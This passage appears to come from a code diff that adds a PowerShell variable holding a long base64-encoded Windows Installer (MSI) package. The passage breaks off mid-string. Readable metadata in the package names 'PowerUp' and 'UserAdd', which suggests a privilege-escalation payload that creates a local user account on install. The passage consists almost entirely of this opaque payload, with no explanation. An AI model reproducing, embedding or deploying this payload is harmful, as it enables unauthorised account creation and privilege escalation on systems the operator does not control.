9TSUxFTlQgQlouVUlOT05FX0lOU1RBTExfQVJHVU1FTlRTIEJaLlVJQkFTSUNfSU5TVEFMTF9BUkdVTUVOVFNCWi5VSVJFRFVDRURfSU5TVEFMTF9BUkdVTUVOVFNCWi5VSUZVTExfSU5TVEFMTF9BUkdVTUVOVFNCWi5GSVhFRF9VTklOU1RBTExfQVJHVU1FTlRTQlouVUlOT05FX1VOSU5TVEFMTF9BUkdVTUVOVFNCWi5VSUJBU0lDX1VOSU5TVEFMTF9BUkdVTUVOVFNCWi5VSVJFRFVDRURfVU5JTlNUQUxMX0FSR1VNRU5UU0JaLlVJRlVMTF9VTklOU1RBTExfQVJHVU1FTlRTYnouU2V0dXBTaXplMjMyOTYwTWFudWZhY3R1cmVyUHJvZHVjdENvZGV7MjcxQkJDRUQtRjM2QS00RThFLUE1NzYtOTQ1NUYwQ0EwMUE4fVByb2R1Y3RMYW5ndWFnZTEwMzNQcm9kdWN0TmFtZU1TSSBXcmFwcGVyIFRlbXBsYXRlUHJvZHVjdFZlcnNpb24xLjAuMC4we0NDMDM1QzE4LTBGQzctNDcwOC04ODA2LUQ0QjA5MUU1OUFBN31TZWN1cmVDdXN0b21Qcm9wZXJ0aWVzV0lYX0RPV05HUkFERV9ERVRFQ1RFRDtXSVhfVVBHUkFERV9ERVRFQ1RFRFNPRlRXQVJFXFtCWi5DT01QQU5ZTkFNRV1cTVNJIFdyYXBwZXJcSW5zdGFsbGVkXFtCWi5XUkFQUEVEX0FQUElEXUxvZ29uVXNlcltMb2dv"
+    $Binary = '0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAPgAEAP7/DAAGAAAAAAAAAAEAAAABAAAAAQAAAAAAAAAAEAAAAgAAAAEAAAD+////AAAAAAAAAAD///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP3////+/////v///y8AAAAFAAAABgAAAP7///8IAAAACQAAAAoAAAALAAAADAAAAA0AAAAOAAAADwAAABAAAAARAAAAEgAAABMAAAAUAAAAFQAAACwAAAAYAAAAFgAAABkAAAAaAAAAGwAAABwAAAAdAAAAHgAAAB8AAAAgAAAAIQAAACIAAAAjAAAAJAAAACUAAAAmAAAAJwAAACgAAAApAAAAKgAAACsAAAD+////LQAAAC4AAAAwAAAA/v///zEAAAD+//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////9SAG8AbwB0ACAARQBuAHQAcgB5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFgAFAP//////////AgAAAIQQDAAAAAAAwAAAAAAAAEYAAAAAAAAAAAAAAABQSJaT62LPAQMAAABAFwAAAAAAAAUAUwB1AG0AbQBhAHIAeQBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoAAIBEAAAABkAAAD/////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANgBAAAAAAAAQEj/P+RD7EHkRaxEMUgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAgEVAAAAAwAAAP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJAAAAEAgAAAAAAABASMpBMEOxOztCJkY3QhxCNEZoRCZCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAACAQQAAAABAAAA/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACoAAAAwAAAAAAAAAEBIykEwQ7E/Ej8oRThCsUEoSAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAIBEgAAAA0AAAD/////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKwAAABgAAAAAAAAAQEjKQflFzkaoQfhFKD8oRThCsUEoSAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgAAgH///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsAAAAKgAAAAAAAABASAtDMUE1RwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAAAAAAAAAAAAAAAAP///////////////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA////////////////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP///////////////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA////////////////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAIAAAADAAAABAAAAAUAAAAGAAAABwAAAP7/////////CgAAAAsAAAAMAAAADQAAAA4AAAAPAAAAEAAAABEAAAASAAAAEwAAABQAAAAVAAAAFgAAABcAAAAYAAAAGQAAABoAAAAbAAAAHAAAAB0AAAAeAAAAHwAAACAAAAAhAAAAIgAAACMAAAAkAAAAJQAAACYAAAAnAAAAKAAAACkAAAD+/////v////7////+////MwAAAP7////+/////v////7////+////OgAAADUAAAA2AAAA/v////7////+/////v///zsAAAA9AAAA/v///z4AAAA/AAAAQAAAAEEAAABCAAAAQwAAAEQAAABFAAAARgAAAEcAAABIAAAASQAAAEoAAAD+////TAAAAE0AAABOAAAATwAAAFAAAABRAAAAUgAAAFMAAABUAAAAVQAAAP7////+////WAAAAP7////+/////v///1wAAAD+//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////7/AAAGAQIAAAAAAAAAAAAAAAAAAAAAAAEAAADghZ/y+U9oEKuRCAArJ7PZMAAAAKgBAAAOAAAAAQAAAHgAAAACAAAAkAEAAAMAAACAAQAABAAAAHABAAAFAAAAgAAAAAYAAAAoAQAABwAAAJQAAAAJAAAAqAAAAAwAAADYAAAADQAAAOQAAAAOAAAA8AAAAA8AAAD4AAAAEgAAAAgBAAATAAAAAAEAAAIAAADkBAAAHgAAAAoAAABJbnN0YWxsZXIAAAAeAAAACwAAAEludGVsOzEwMzMAAB4AAAAnAAAAe0EwNDlFMzFGLTc3MDEtNEM0QS1BQ0JDLUIyNjBFQjA4QkI0Q30AAEAAAAAALfR1QTjPAUAAAAAALfR1QTjPAQMAAADIAAAAAwAAAAIAAAADAAAAAgAAAB4AAAAXAAAATVNJIFdyYXBwZXIgKDQuMS41NC4wKQAAHgAAAEAAAABJbnN0YWxsZXIgd3JhcHBlZCBieSBNU0kgV3JhcHBlciAoNC4xLjU0LjApIGZyb20gd3d3LmV4ZW1zaS5jb20AHgAAAAgAAABQb3dlclVwAB4AAAAIAAAAVXNlckFkZAAeAAAAEAAAAFVzZXJBZGQgMS4wLjAuMABBOM8BAwAAAMgAAAADAAAAAgAAAB4AAAArAAAAV2luZG93cyBJbnN0YWxsZXIgWE1MIFRvb2xzZXQgKDMuOC4xMTI4LjApAAADAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYABgAGAAYABgAGAAYABgAGAAYACgAKACIAIgAiACkAKQApACoAKgAqACsAKwAvAC8ALwAvAC8ALwA1ADUANQA9AD0APQA9AD0ATQBNAE0ATQBNAE0ATQBNAFwAXABhAGEAYQBhAGEAYQBhAGEAbw